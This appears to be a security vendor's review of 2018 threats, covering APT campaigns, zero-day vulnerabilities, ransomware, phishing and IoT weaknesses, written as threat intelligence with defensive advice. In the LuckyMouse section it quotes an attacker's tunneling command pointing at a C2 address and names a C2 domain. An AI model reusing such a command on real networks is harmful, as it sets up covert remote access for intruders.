At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Brower extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where lack of standardization leaves developers to ignore security, or consider it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to man-in-the-middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

